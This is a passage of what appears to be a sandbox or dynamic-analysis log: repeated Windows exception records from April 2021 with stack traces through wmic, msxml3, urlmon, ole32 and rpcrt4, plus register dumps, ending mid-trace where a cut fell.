exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 11726652 registers.edi: 3472020 registers.eax: 11726652 registers.ebp: 11726732 registers.edx: 53 registers.ebx: 11727016 registers.esi: 2147746133 registers.ecx: 3238024	1
__exception__ April 12, 2021, 10:40 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72ab6f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72ab6e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x72ab27a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72ab2652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x72ab253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72ab2411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x72ab25ab wmic+0x39c80 @ 0xc59c80 wmic+0x3b06a @ 0xc5b06a wmic+0x3b1f8 @ 0xc5b1f8 wmic+0x36fcd @ 0xc56fcd wmic+0x3d6e9 @ 0xc5d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 2025944 registers.edi: 1957755408 registers.eax: 2025944 registers.ebp: 2026024 registers.edx: 1 registers.ebx: 3207684 registers.esi: 2147746133 registers.ecx: 3727830207	1
__exception__ April 12, 2021, 10:40 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 32895380 registers.edi: 4578044 registers.eax: 32895380 registers.ebp: 32895460 registers.edx: 53 registers.ebx: 32895744 registers.esi: 2147746133 registers.ecx: 4352056	1
__exception__ April 12, 2021, 10:40 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72a16f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72a16e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x72a127a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72a12652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x72a1253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72a12411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x72a125ab wmic+0x39c80 @ 0x819c80 wmic+0x3b06a @ 0x81b06a wmic+0x3b1f8 @ 0x81b1f8 wmic+0x36fcd @ 0x816fcd wmic+0x3d6e9 @ 0x81d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 1565984 registers.edi: 1957755408 registers.eax: 1565984 registers.ebp: 1566064 registers.edx: 1 registers.ebx: 4321716 registers.esi: 2147746133 registers.ecx: 3728895584	1
__exception__ April 12, 2021, 10:40 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 40760168 registers.edi: 9370196 registers.eax: 40760168 registers.ebp: 40760248 registers.edx: 53 registers.ebx: 40760532 registers.esi: 2147746133 registers.ecx: 9136192	1
__exception__ April 12, 2021, 10:40 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72a16f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72a16e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x72a127a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72a12652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x72a1253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72a12411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x72a125ab wmic+0x39c80 @ 0x419c80 wmic+0x3b06a @ 0x41b06a wmic+0x3b1f8 @ 0x41b1f8 wmic+0x36fcd @ 0x416fcd wmic+0x3d6e9 @ 0x41d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 1829208 registers.edi: 1957755408 registers.eax: 1829208 registers.ebp: 1829288 registers.edx: 1 registers.ebx: 9105852 registers.esi: 2147746133 registers.ecx: 3592740927	1
__exception__ April 12, 2021, 10:40 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 36697280 registers.edi: 6150948 registers.eax: 36697280 registers.ebp: 36697360 registers.edx: 53 registers.ebx: 36697644 registers.esi: 2147746133 registers.ecx: 5924928	1
__exception__ April 12, 2021, 10:40 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72a16f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72a16e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x72a127a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72a12652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x72a1253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72a12411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x72a125ab wmic+0x39c80 @ 0x89c80 wmic+0x3b06a @ 0x8b06a wmic+0x3b1f8 @ 0x8b1f8 wmic+0x36fcd @ 0x86fcd wmic+0x3d6e9 @ 0x8d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3402208 registers.edi: 1957755408 registers.eax: 3402208 registers.ebp: 3402288 registers.edx: 1 registers.ebx: 5894588 registers.esi: 2147746133 registers.ecx: 3592612163	1
__exception__ April 12, 2021, 10:40 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff 